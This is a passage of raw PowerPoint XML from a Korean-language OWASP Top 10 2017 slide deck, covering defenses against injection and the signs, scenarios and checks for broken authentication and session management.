              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>또는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 함께 실행된다면 저장 프로시저는 여전히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>인젝션을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 실행할 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" lvl="0" indent="-82550">
              <a:lnSpc>
                <a:spcPct val="111111"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>서버측 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>화이트리스트”나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 적극적인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>입력값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 유효성 검증을 하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>하지만 많은 애플리케이션이 모바일 애플리케이션을 위한 텍스트 영역이나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 같은 특수 문자를 필요로 하기에 완벽한 방어책은 아닙니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" lvl="0" indent="-82550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>남은 동적 쿼리들을 위하여 특정 필터링 구문을 사용하여 인터프리터에 대한 특수 문자를 필터링 처리하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>테이블</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>컬럼 이름 등과 같은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>구조는 필터링 처리를 할 수가 없기 때문에 사용자가 제공한 구조 이름은 안전하지 않습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이는 보고서 작성 소프트웨어의 일반적인 문제입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" lvl="0" indent="-82550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIMIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>과 다른 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>컨트롤 쿼리를 사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>인젝션으로 인한 대량 노출을 예방하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="83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95400" cy="831000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8327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216000" rIns="91425" bIns="36000" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="-127000" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="7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/>
              <a:t> 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371600" y="76199"/>
            <a:ext cx="5486400" cy="762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Exo 2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>인젝션</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="301" name="Shape 301"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215211296"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957600"/>
          <a:ext cx="6861600" cy="210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 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty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" marR="18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0000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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확산 정도</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="12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120000"/>
                        <a:buFont typeface="Arial"/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탐지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endParaRPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrik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endParaRPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrik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환경변수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파라미터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내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외부 웹 서비스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유형의 사용자 등 거의 모든 데이터의 소스는 인젝션 공격요인이 될 수 있습니다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악의적인 공격자가 악의적인 데이터를 인터프리터에 보낼 때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  <a:hlinkClick r:id="rId21"/>
                        </a:rPr>
                        <a:t>인젝션 결함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 발생합니다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인젝션 취약점은 매우 일반적이며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특히 과거에 사용된 코드에서 나타납니다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SQL, LDAP, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="89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XPath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altLang="ko-KR" sz="89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NoSQL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쿼리들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운영체제 명령어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 XML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파서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SMTP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헤더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표현식 언어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ORM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쿼리 등에서 자주 발견됩니다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인젝션 취약점은 코드를 검증하는 과정에서 쉽게 발견할 수 있습니다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공격자는 스캐너와 퍼저로 인젝션 결함을 찾는데 도움을 얻습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="89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인젝션은 데이터 손실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파괴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권한 없는 사용자에게 정보 노출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승인되지 않은 당사자에게 정보 무단 공개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책임 부재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거부 결과를 초래할 수 있습니다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때때로 인젝션으로 호스트를 완전하게 탈취할 수도 있습니다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비즈니스는 애플리케이션과 데이터의 필요성에 따라 달라질 수 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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" name="Shape 302"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-15125" y="76198"/>
            <a:ext cx="1386600" cy="8060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A1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40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:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Shape 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Shape 304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000" b="1"/>
              <a:t>비즈니스?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Shape 305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/>
              <a:t>공격요인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Shape 306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308" name="Shape 308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680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b="1"/>
              <a:t>위협요소</a:t>
            </a:r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1775" y="3"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/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1800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>A1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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6989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6400800"/>
            <a:ext cx="3383400" cy="2743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공격 시나리오 예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="14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altLang="ko-KR" sz="2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900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>시나리오 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>알려진 암호 목록</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 사용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>계정 정보 삽입</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 일반적입니다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애플리케이션이 자동화된 위협 또는 계정 정보 삽입 방어를 구현하지 않은 경우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애플리케이션을 암호 오라클로 사용하여 계정 정보가 유효한지 확인할 수 있습니다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900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>시나리오 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>대부분의 인증 공격은 암호를 유일한 인증 요소로 계속 사용하는 것으로 인해 발생합니다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모범 사례로 간주된 비밀번호 주기와 복잡성 요구사항은 사용자가 취약한 비밀번호를 등록하고 재사용할 수 있도록 권장합니다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따라서 조직에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NIST 800-63</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 따라 이러한 관행을 중단하고 다중 인증을 사용하는 것이 좋습니다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11111"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>시나리오 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>애플리케이션 세션에 대한 적절한 만료 시간이 정해지지 않는 것입니다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사용자는 공용 컴퓨터로 애플리케이션에 접근</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로그아웃”을 선택하지 않고 단순히 브라우저 탭을 닫고 나갑니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>한시간 이후에 공격자가 같은 브라우저를 사용한다면 사용자는 여전히 인증되어 있을 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="9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11111"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000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0" y="3168000"/>
            <a:ext cx="3383280" cy="3150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취약점 확인 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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인증과 관련된 공격으로부터 보호하기 위해서 사용자의 신원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인증 및 세션을 관리하는 것이 매우 중요합니다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11111"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>만약 애플리케이션이 아래와 같을 경우 인증 취약점이 있을 수 있습니다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1111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공격자가 유효한 사용자 이름과 비밀번호를 가진 상태에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>계정 정보 삽입</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>과 같은 자동화 공격을 허용합니다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무차별 공격 또는 기타 자동화 공격을 허용합니다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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password1” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>또는 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin/admin”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>과 같은 기본 암호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약한 암호 또는 잘 알려진 암호를 허용합니다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안전하지 않게 만들어진 “지식 기반 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>답변”과</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 같은 취약하거나 효과가 없는 자격 증명 복구나 비밀번호 복구를 허용합니다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평문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>암호화되거나 취약한 해쉬 비밀번호를 사용합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>참조</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="850" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>민감한 데이터 노출</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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다중 인증이 없거나 비효율적입니다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세션 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 노출됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.(e.g., URL rewriting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="0" indent="-828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850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>세션 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 제대로 무효화 시키지 않습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로그아웃이나 비활성 기간 중에 사용자 세션 및 인증 토큰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>특히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSO(Single Sign On)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>토큰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
